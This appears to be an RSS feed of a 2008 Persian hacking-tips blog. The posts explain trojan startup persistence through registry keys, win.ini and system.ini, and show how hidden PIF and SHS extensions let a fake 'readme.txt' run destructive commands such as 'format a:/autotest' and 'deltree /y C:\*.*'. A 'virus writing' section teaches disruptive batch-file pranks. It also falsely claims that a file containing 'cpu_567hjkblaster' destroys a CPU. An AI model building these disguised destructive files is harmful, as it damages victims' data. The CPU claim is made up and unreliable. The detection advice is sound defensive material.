<P class=MsoNormal dir=rtl style="TEXT-JUSTIFY: kashida; MARGIN-RIGHT: 18pt; TEXT-ALIGN: justify; TEXT-KASHIDA: 0%"><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 6- روش </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">ShellOpen</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> رجیستری: در رجیستری و در زیر کلیدهای زیر باید همیشه عبارت </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">"%1" %* </SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">نوشته شده باشد اما اگر به عبارتی مانند </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">trojan.exe "%1" %* </SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">&nbsp;برخورد کردید، بدانید که فایل </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">Trojan.exe</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> سعی دارد کاری کند با هر بار اجرای هر فایل اجرایی روی رایانه شما، او هم اجرا شود:</SPAN></P>
<P class=MsoNormal style="MARGIN-LEFT: 18pt; DIRECTION: ltr; unicode-bidi: embed; TEXT-ALIGN: left"><SPAN style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">&nbsp; [HKEY_CLASSES_ROOT\exefile\shell\open\c</SPAN><SPAN style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">ommand]</SPAN></P>
<P class=MsoNormal style="MARGIN-LEFT: 18pt; DIRECTION: ltr; unicode-bidi: embed; TEXT-ALIGN: left"><SPAN lang=FA dir=rtl style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">&nbsp;</SPAN></P>
<P class=MsoNormal style="MARGIN-LEFT: 18pt; DIRECTION: ltr; unicode-bidi: embed; TEXT-ALIGN: left"><SPAN style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">&nbsp; [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\c</SPAN><SPAN style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">ommand]</SPAN></P>
<P class=MsoNormal dir=rtl style="TEXT-JUSTIFY: kashida; MARGIN-RIGHT: 18pt; TEXT-ALIGN: justify; TEXT-KASHIDA: 0%"><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 7- استفاده از روشهایی مانند </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">&nbsp;Binding</SPAN><SPAN style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> <SPAN lang=FA>و جایگزینی: اگرچه روشهایی که در بالا نوشته شد حاوی تمامی روشهایی است که امروزه مورد استفاده قرار می گیرند، روشهای اجرا هرگز به موارد فوق ختم نمی شوند و همیشه جای ابتکار یا استفاده از روشهایی که فقط روی سیستمها یا در شرایط خاصی عمل کنند باز است بنابراین به صرف اینکه مطمئن شوید از طریق روشهای بالا سیستم شما آلوده نشده است کفایت نمی کند. به عنوان نمونه در روشهایی مانند </SPAN></SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">&nbsp;Binding</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> و جایگزینی که هنوز چندان مورد استفاده قرار نگرفته و پیش بینی می شود در آینده نزدیک بیشتر مورد استفاده قرار بگیرند، فایلی که قرار است با هر بار اجرای ویندوز خود را اجرا کند، فایل دیگری را پیدا می کند که این کار را انجام دهد و سپس خود را به آن می چسباند. به عنوان نمونه با تشخیص اینکه روی سیستم، فایل مربوط به ویندوز مسنجر با هر بار اجرای ویندوز اجرا می شود، کاری می کند که در هنگام اجرای ویندوز مسنجر، آن برنامه هم اجرا شود. اگر برنامه برای این کار خود را به فایل اجرایی مسنجر ویندوز بچسباند، می گویند از </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">Binding</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> استفاده کرده است اما اگر خود را جایگزین آن کند، می گویند از روش جایگزینی استفاده کرده است. اگرچه این روشها از قدیم توسط ویروسهای مختلف برای آلوده کردن فایلهای اجرایی به کار گرفته می شدند اما استفاده از این روش برای اجرای همزمان با ویندوز احتمالاً به زودی بیشتر مورد استفاده قرار خواهد گرفت.</SPAN></P>
<P class=MsoNormal dir=rtl style="TEXT-JUSTIFY: kashida; MARGIN-RIGHT: 18pt; TEXT-ALIGN: justify; TEXT-KASHIDA: 0%"><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">&nbsp;</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">&nbsp;&nbsp;&nbsp;&nbsp; پس از مطالعه روشهای بالا، احتمالاً شما هم با من هم عقیده هستید که پیدا کردن یک تروا به روش دستی کار چندان ساده ای نیست؛ اما اکثریت قریب به اتفاق ترواها از روشهای رجیستری استفاده می کنند و شما از تغییرات ایجاد شده در قسمتهای </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">Run</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> می توانید به آلوده شدن سیستم پی ببرید. یک ابزار بسیار عالی که در اکثر ویندوزها وجود دارد (در ویندوز 2000 وجود ندارد) ابزاری به نام </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">System Configuration Utility</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> است. برای اجرای این ابزار، از منوی </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">Start</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">، </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">Run</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> را انتخاب کنید (یا کلید ویندوز کیبورد خود را بگیرید و سپس کلید </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">R</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> را فشار دهید) و در داخل جعبه متن آن تایپ کنید: </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">MSConfig</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> و </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">OK</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> را فشار دهید. اگرچه این ابزار کاربردهای مختلفی دارد، ما در اینجا فقط به ذکر کاربردهایی از آن می پردازیم که به موضوع بحث ما بیشتر مربوط هستند. پس از باز شدن صفحه </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">System Configuration Utility</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">، از بالای صفحه </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">Startup</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> را انتخاب کنید. خواهید دید که اکثر فایلهایی که خود به خود همراه ویندوز شما اجرا می شوند در اینجا لیست شده اند و شما با حذف تیک کنار اسم آنها می توانید آنها را از کار بیندازید. در قسمت </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">Startup item</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> نامی که برنامه برای خود برگزیده است، در قسمت </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">c</SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">ommand</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">، آدرس فایل اجرایی برنامه و در قسمت </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">Location</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> تکنیک مورد استفاده توسط برنامه برای اجرا را خواهید دید. توجه به نکات زیر هم در استفاده از </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">MSConfig</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> به شما کمک خواهد کرد:</SPAN></P>
<P class=MsoNormal dir=rtl style="TEXT-JUSTIFY: kashida; TEXT-INDENT: 18pt; MARGIN-RIGHT: 18pt; TEXT-ALIGN: justify; TEXT-KASHIDA: 0%"><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">1- چون معمولاً قسمتهای </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">command</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> و </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">location</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> فضای کافی برای نمایش کامل محتویات خود را ندارند، موش رایانه را روی خط جداکننده </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">command</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> از </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">location</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> یا خط انتهای </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">location</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> ببرید تا بتوانید اندازه این قسمتها را تغییر دهید.</SPAN></P>
<P class=MsoNormal dir=rtl style="TEXT-JUSTIFY: kashida; TEXT-INDENT: 18pt; MARGIN-RIGHT: 18pt; TEXT-ALIGN: justify; TEXT-KASHIDA: 0%"><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">&nbsp;2- عبارتهای </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">HKCU</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> و </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">HKLM</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> به ترتیب مخفف </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">HKEY_LOCAL_MACHINE</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> و </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">HKEY_CURRENT_USER</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> می باشند که در بالا و در تکنیک شماره 5 به آنها اشاره شد.</SPAN></P>
<P class=MsoNormal dir=rtl style="TEXT-JUSTIFY: kashida; TEXT-INDENT: 18pt; MARGIN-RIGHT: 18pt; TEXT-ALIGN: justify; TEXT-KASHIDA: 0%"><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">&nbsp;3- برای مشاهده فایلهای </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">System.ini</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> و </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">win.ini</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">، علاوه بر روش گفته شده در بالا (در مورد شماره 2) کافی است که از قسمت بالای </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">MSConfig</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> گزینه های </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">SYSTEM.INI</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> و </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">WIN.INI</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> را انتخاب کنید.</SPAN>&nbsp;</P>]]></description>
					<pubDate>Tue, 22 Apr 2008 20:48:43 GMT</pubDate>
					<comments>http://amozesheiranian.blogsky.com/Comments.bs?PostID=65</comments>
          <guid>http://amozesheiranian.blogsky.com?PostID=65</guid>
				</item>
			
				<item>
					<title><![CDATA[ترفندهای هکرها-فایلهایی نظیر win.ini]]></title>
					<link>http://amozesheiranian.blogsky.com?PostID=64</link>
					<description><![CDATA[<P><STRONG><FONT face=Arial color=#990066>در این روش می توان فایل را در قسمت C:WindowsStartMenuProgramsstart کپی کرد البته شاخه ها مانند C:Windows متغییر است و بنا به دایرکتری نصب ویندوز شما فرق می کند . <BR><BR>روش 2<BR>فایل Win.ini است :: <BR>این فایل هم قدرت اجرایی دارد . مانند :: <BR>run= trojan <BR>NullPort=None <BR>BaseCodePage=1256 <BR><BR>روش 3 <BR>استفاده از فایل System.ini می باشد : <BR>اگر شما پیدا کردید کد shell=Explorer.exe trojan.exe زیر را فایل trojan.exe بعد از Explorer.exe اجرا خواهد شد </FONT></STRONG></P>
<P>پسوندهای پنهان فایلهای ویندوز <BR>ممکن است از این موضوع آگاهی نداشته باشید، اما حتی اگر به ویندوز بگویید که تمام پسوندهای فایل را نشان دهد، هنوز هم فایلهایی وجود دارند که بطور پیش فرض مخفی شده‌اند. همچنین هر برنامه نصب شده‌ایی می‌تواند پسوندها را پیکربندی کند تا پنهان شوند. در اینجا در مورد چگونگی انجام این کار و همچنین دلیل اینکه چرا برخی از پسوندهای پنهان می‌توانند برای تعدادی از کاربرهای کامپیوتر خطرناک باشند، مثالهایی آورده شده است. به فرض اینکه شما قبلا ویندوز explorer را برای نشان دادن تمام پسوندهای پیکربندی کرده‌اید. </P>
<P>پسوندهای SHS <BR>یک کپی از notepad.exe بگیرید و آن را روی desktop خود قرار دهید. Wordpad را باز کنید. روی notepad.exe کلیک کنید و آن را به سمت سند باز شده wordpad بکشید. روی notepad.exe کلیک کنید و آن را به عقب به سمت desktop بکشید. فایلی را که ایجاد شده است (Scrap) به Readme.txt تغییر نام دهید. </P>
<P>حالایک آیکن که نشان دهنده سند متنی است و فایلی با نام مشخص readme.txt بر روی desktop شما وجود دارد کلیک کردن بر روی فایل فوق باعث می‌شود notepad باز ‌شود. اگر این فایل یک Trojan باشد، شما فریب خورده‌اید و توسط آنچه که یک فایل متنی بی‌خطر بنظر می‌رسید آلوده شده‌اید. اگر اجازه نمایش این پسوند داده می شد شما فریب فایل Readme.txt.shs را نمی‌خوردید. </P>
<P>پسوندهای PIF <BR>اگر سعی کنید تا notepad.exe را به anything.txt.pif تغییر نام دهید، تنها فایلی با نام anything.txt روی desktop خود خواهید دید. و این بدین دلیل است که PIF پسوند دیگری است که ویندوز بطور پیش فرض پنهان می‌کند. اگر شما فایل را اجرا کنید برنامه اجرا خواهد شد، به خاطر اینکه ویندوز پسوندهای PIF را اجرا خواهد کرد حتی اگر آنها فایلهای اجرایی باشند. </P>
<P>پسوندهای SCR <BR>پسوند دیگری که باید مراقب آن بود SCR است. کپی notepad.exe خود را به notepad.scr تغییر نام دهید و روی آن کلیک کنید. Notepad به عنوان یک فایل اجرایی اجرا خواهد شد. بسیاری از افراد توسط هکرهایی فریب می‌خورند که account یک قربانی را بدست آورده‌اند. هکر email یا هر نوع پیغامی را به تمام دوستان قربانی می‌فرستد که “این صفحه نمایش جدید و بامزه را ببینید از خنده روده بر خواهید شد!” از آنجایی که این پیغام از یک منبع مطمئن آمده، اکثر افراد فریب خورده و فایل SCR را اجرا می‌کنند که در نهایت به هکری ختم می‌شود که به کامپیوتر شما متصل شده است. </P>
<P>فرمانهای خطرناکی که می‌توانند گنجانده شوند <BR>پسوندهای میانبر PIF <BR>برخی از پسوندهای پنهان فایل قادرند به سادگی با فرمانهای پنهان شده‌ای که می‌توانند برای سیستم شما مخرب باشند برنامه‌ریزی شوند. این یک آزمایش ساده است: </P>
<P>دکمه راست ماوس خود را روی desktop کلیک کنید و New و سپس Shotcut را انتخاب نمایید. در Command line تایپ کنید: <BR>format a:/autotest <BR>Next را کلیک کنید. در “Select a name for the shortcut” تایپ کنید: readme.txt سپس Next را کلیک کنید. یک آیکن notepad را انتخاب کرده و Finish را کلیک کنید. حالا شما در desktop خود فایلی با نام readme.txt و با آیکن notepad دارید. مطمئن شوید که در درایو شما دیسکی است که از دست دادن آن برای شما اشکالی ندارد و روی آیکن کلیک کنید. فایلی که شما روی آن کلیک کرده‌اید درایو A: را فرمت خواهد کرد. البته آیکن هکر درایو دیگری را مورد هدف قرار خواهد داد یا ممکن است نامی همچون ‘game.exe’ و فرمانی برای حذف کردن دایرکتوری ویندوز شما یا (deltree /y C:\*.*) کل درایو C شما داشته باشد. اگر پسوند PIF پنهان نشود، قادر به فریب شما نخواهد بود. </P>
<P>پسوند SHS <BR>فایلهای Scrap نیز می‌توانند فرمانهای گنجانده شده را پنهان کند. این یک آزمون ساده است: از notepad.exe یک کپی بگیرید و آن را روی desktop خود قرار دهید. Wordpad را باز کنید.Notepad.exe را کلیک کنید و آن را به سمت سند باز شده wordpad بکشید. روی Edit کلیک کنید و Package Object و سپس Edit package را انتخاب کنید. روی Edit و سپس Command Line کلیک کنید. <BR>در کادر، دستوری مانند format a:/autotest را تایپ کنید و روی OK کلیک کنید. آیکن نیز می‌تواند از این پنجره تغییر یابد. از پنجره خارج شوید، این کار سند را به روز خواهد کرد. روی notepad.exe کلیک کنید و آن را به عقیب به سمت Desktop بکشید. فایلی را که ایجاد شده (Scrap) به Readme.txt تغییر نام دهید. </P>
<P>حالا شما آنچه را که شبیه یک فایل متنی است دارید. اگر این فایل اجرا شود درایو A: را فرمت خواهد کرد. همانگونه که در مثال بالا برای پسوندهای میانبر PIF دیده شد، هکر می‌تواند از فرمانهای خطرناکتری استفاده کند. </P>
<P>روشهای Trojan در هنگام راه اندازی <BR>روشهای راه اندازی استاندارد <BR>اکثر افراد از راههای متفاوتی که هکرها برای راه اندازی فایلهای Trojan استفاده می‌کنند آگاه نیستند. اگر هکری کامپیوتر شما را با یک Trojan آلوده کند، نیاز به انتخاب یک روش راه‌اندازی خواهد داشت، بگونه‌ای که در زمان راه‌اندازی مجدد کامپیوتر شما Trojan بارگذاری شود. روشهای معمول راه‌اندازی شامل کلیدهای اجرایی registry، فولدر راه اندازی ویندوز، Windows Load= یا run=lines یافته شده در فایل win.ini و shell=line یافته شده در system.ini ویندوز می‌باشند. </P>
<P>روشهای راه اندازی خطرناک <BR>از آنجایی که فقط تعداد اندکی از این روشهای راه اندازی وجود دارند، هکرهای زیادی را یافته‌ایم که در پیدا کردن روشهای جدید راه‌اندازی افراط می‌کنند. این شامل استفاده از تغییرات خطرناکی در سیستم registry می‌باشد، که در صورتی که فایل Trojan یا فایل همراه آن از بین برود سیستم را بصورت بلااستفاده درخواهد آورد. این یک دلیل استفاده نکردن از نرم افزار ضد ویروس برای از بین بردن Trojanهاست. اگر یکی از این روشها استفاده شود، و فایل بدون ثابت کردن registry سیستم از بین برود، سیستم شما قادر به اجرای هیچگونه برنامه‌ای پس از راه اندازی مجدد کامپیوترتان نخواهد بود. <BR>قبل از آنکه سراغ registry برویم لازم به توضیح است که یک فولدر به صورت C:\WINDOWS\StartMenu\Program\StartUp وجود دارد که هر فایلی در اینجا باشد هنگام راه اندازی ویندوز اجرا خواهد شد.توجه داشته باشید که هرگونه تغییری می‌تواند سیستم شما را به خطر بیاندازد بنابراین، هرچه ما می‌گوییم انجام دهید. برای دستیابی به registry به منوی start&gt;run&gt; بروید و “regedit” را بدون علامت ” ” تایپ کنید. در registry چندین مکان برای راه اندازی Startup وجود دارد که لیستی از آنها را در اینجا می آوریم. </P>
<P>[HKEY_CLASSES_ROOT\exefile\shell\open\command] =”\”%1\” %*” <BR>[HKEY_CLASSES_ROOT\comfile\shell\open\command] =”\”%1\” %*” <BR>[HKEY_CLASSES_ROOT\batfile\shell\open\command] =”\”%1\” %*” <BR>[HKEY_CLASSES_ROOT\htafile\Shell\Open\Command]=”\”%1\” %*” <BR>[HKEY_CLASSES_ROOT\piffile\shell\open\command] =”\”%1\” %*” <BR>[HKEY_LOCAL_MACHINE\Software\CLASSES\batfile\shell\open\command] =”\”%1\” %*” <BR>[HKEY_LOCAL_MACHINE\Software\CLASSES\comfile\shell\open\command]=”\”%1\” %*” <BR>[HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open\command]=”\”%1\”%*” <BR>[HKEY_LOCAL_MACHINE\Software\CLASSES\htafile\Shell\Open\Command]=”\”%1\”%*” <BR>[HKEY_LOCAL_MACHINE\Software\CLASSES\piffile\shell\open\command]=”\”%1\”%*” <BR>اگر این کلیدها مقدار “\”%1\”%*” را نداشته باشند و به جای اجرای فایل در هنگام راه اندازی به “\”Server.exe %1\” %*” تغییر یابد به احتمال زیاد یک Trojan است. <BR>روش راه اندازی ICQ <BR>روشی راه اندازی دیگری که امروزه استفاده از آن معمول است شناسایی شبکه ICQ می‌باشد. بسیاری از کاربران ICQ نمی‌دانند که هکر می‌تواند یک خط پیکربندی را به ICQ اضافه نماید تا با هر بار بارگذاری شدن برنامه Trojan نیز راه اندازی شود. به عنوان آزمایش مراحل زیر را انجام دهید: <BR>ICQ را باز کنید. روی آیکن ICQ کلیک کنید و preference را انتخاب نمایید. روی Edit launch List کلیک کنید. روی Add کلیک کنید. روی Browse کلیک کنید. فایلی را برای اضافه کردن به Windows\notepad.exe بیابید که به کار این آزمایش بیاید. روی Open و سپس OK کلیک کنید. زمانی که شما ICQ را راه اندازی مجدد می‌کنید فایل اجرا خواهد شد.<BR></P>
<P class=akpc_pop>&nbsp;</P>]]></description>
					<pubDate>Fri, 18 Apr 2008 22:47:30 GMT</pubDate>
					<comments>http://amozesheiranian.blogsky.com/Comments.bs?PostID=64</comments>
          <guid>http://amozesheiranian.blogsky.com?PostID=64</guid>
				</item>
			
				<item>
					<title><![CDATA[درست کردن پوشه بی نام و نشان:]]></title>
					<link>http://amozesheiranian.blogsky.com?PostID=63</link>
					<description><![CDATA[در این ترفند شما بدون استفاده از Hidden کردن پوشه ای خود را محو کنید!<BR>ابتدا پوشه مورد نظر را انتخاب کنید و بعد کلیک راست کرده و Rename را انتخاب کنین , سپس Alt را نگه داشته و با استفاده از اعداد سمت راست کیبورد عدد 255 را تایپ کنید و Enter را فشار دهید.خواهید دید که پوشه ای مورد نظر بی نام است .<BR>حال روی پوشه ای مورد نظر کلیک راست کرده و Properties را انتخاب کنید از صفحه ای باز شده Customize را انتخاب کنید و بعد روی Chang Icon کلیک کنید و در صفحه ای باز شده یک آیکن بیرنگ انتخاب کنید خواهید دید که پوشه مورد نظر کاملا محو شده است!]]></description>
					<pubDate>Fri, 18 Apr 2008 22:31:51 GMT</pubDate>
					<comments>http://amozesheiranian.blogsky.com/Comments.bs?PostID=63</comments>
          <guid>http://amozesheiranian.blogsky.com?PostID=63</guid>
				</item>
			
				<item>
					<title><![CDATA[آموزش ویروس نویسی]]></title>
					<link>http://amozesheiranian.blogsky.com?PostID=62</link>
					<description><![CDATA[<TABLE class=Tbl cellSpacing=0 cellPadding=0 width="99%" border=1>
<TBODY>
<TR>
<TD class=Tb1 borderColor=#151515 width="100%" background=Http://Mihanblog.com/Default/Temp10/hnav.gif height=20>
<P dir=rtl><FONT color=#000000>آموزش ساختن ویروس [ویروس نویسی]</FONT></P></TD></TR></TBODY></TABLE>
<TABLE class=Tbl cellSpacing=0 cellPadding=0 width="99%" border=1>
<TBODY>
<TR>
<TD class=Tb1 width="100%">
<P dir=rtl align=justify><FONT color=#000000>&nbsp; </FONT>
<P><FONT color=#000000 size=1>امروز میخوام آموزش ساختن یه ویروس رو بهتون یاد بدم.</FONT></P>
<P><FONT color=#000000 size=1>این ویروس هم مثل بلستر پس ازاجرا با دادن مدت زمان&nbsp; 30&nbsp; ثانیه کامپیوتر شما رو خاموش میکنه.</FONT></P>
<P><FONT color=#000000 size=1>برای ساختن این ویروس ابتدا روی صفحه دسکتاب راست کلیک کنید.</FONT></P>
<P><FONT color=#000000 size=1>سپس new&nbsp; و بعد از اون text document&nbsp; رو انتخاب کنید.</FONT></P>
<P><FONT color=#000000 size=1>سپس وارد این فایل متنی شده و این عبارت رو تایپ کنید.</FONT></P>
<P><FONT color=#000000 size=1>Shutdown –r </FONT></P>
<P><FONT color=#000000 size=1>حالا از منوی فایل save as&nbsp; رو انتخاب کنید.</FONT></P>
<P><FONT color=#000000 size=1>در قسمت file name&nbsp; اسم فایل رو مشخص کنید.</FONT></P>
<P><FONT color=#000000 size=1>توجه کنید که این اسم حتما با پسوند bat&nbsp; باشه.مثل rockboys.bat</FONT></P>
<P><FONT color=#000000 size=1>در قسمت encoding&nbsp; شما باید ANSI&nbsp; رو انتخاب کنید.</FONT></P>
<P><FONT color=#000000 size=1>حالا save&nbsp; کنید.</FONT></P>
<P><FONT color=#000000 size=1>شما میتونید این فایل رو روی خودتون اجرا کنید و نتیجه کار رو ببینید.</FONT></P>
<P><FONT color=#000000 size=1>برای اینکه از&nbsp; خاموش شدن کامپیوترتون جلوگیری کنید&nbsp; کافیه در قسمت run&nbsp; عبارت زیر رو تایپ کنید.</FONT></P>
<P><FONT color=#000000 size=1>Shutdown –a</FONT></P>
<P dir=rtl>&nbsp;</P></TD></TR></TBODY></TABLE>
<TABLE class=Tbl cellSpacing=0 cellPadding=0 width="99%" border=1>
<TBODY>
<TR>
<TD class=Tb1 borderColor=#151515 width="100%" background=Http://Mihanblog.com/Default/Temp10/hnav.gif height=20>
<P dir=rtl><FONT color=#000000>آموزش ساختن بد ترین وآزاردهنده ترین ویروس در دنیا (Blastr&amp;saser) [ویروس نویسی]</FONT></P></TD></TR></TBODY></TABLE>
<TABLE class=Tbl cellSpacing=0 cellPadding=0 width="99%" border=1>
<TBODY>
<TR>
<TD class=Tb1 width="100%">
<P dir=rtl align=justify><FONT color=#000000></FONT>
<P><FONT color=#000000>1. روی دسک تاپ رایت کلیک کنید وازگزینه ی new - text document را انتخاب کنید.</FONT></P>
<P><FONT color=#000000>2. حالا وارد text document&nbsp; شوید ودر آن عبارت زیررا تایپ کنید.</FONT></P>
<P><FONT color=#000000>cpu_567hjkblaster</FONT></P>
<P><FONT color=#000000>3. بعد از سیو کردن آنرا rename&nbsp;&nbsp; کرده و اسمی برایش انتخاب کنید.</FONT></P>
<P><FONT color=#000000>حالا اگه فایل رو اجرا کنید باید فاتحه ی cpu رو بخونین.</FONT></P>
<P><FONT color=#000000></FONT></P>
<P>&nbsp;</P></TD></TR></TBODY></TABLE>
<TABLE class=Tbl cellSpacing=0 cellPadding=0 width="99%" border=1>
<TBODY>
<TR>
<TD class=Tb1 borderColor=#151515 width="100%" background=Http://Mihanblog.com/Default/Temp10/hnav.gif height=20>
<P dir=rtl><FONT color=#000000>اینم یه ویروس باحال در win xp : [ویروس نویسی]</FONT></P></TD></TR></TBODY></TABLE>
<TABLE class=Tbl cellSpacing=0 cellPadding=0 width="99%" border=1>
<TBODY>
<TR>
<TD class=Tb1 width="100%">
<P dir=rtl align=justify>
<TABLE class=Tbl cellSpacing=0 cellPadding=0 width="99%" border=1>
<TBODY>
<TR>
<TD class=Tb1 width="100%">
<P dir=rtl align=justify><FONT face=tahoma,arial,helvetica,sans-serif color=#000000 size=2></FONT></P>
<P><FONT face=tahoma,arial,helvetica,sans-serif color=#000000 size=2>یه&nbsp; Text Document&nbsp; باز کنید و بعد این کامند رو توش بنویسید :</FONT></P></TD></TR></TBODY></TABLE>
<P><FONT face=tahoma,arial,helvetica,sans-serif color=#000000 size=2>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <IMG hspace=0 src="http://www.bamzi.net/Hack/images/viros.gif" align=baseline border=0></FONT></P>
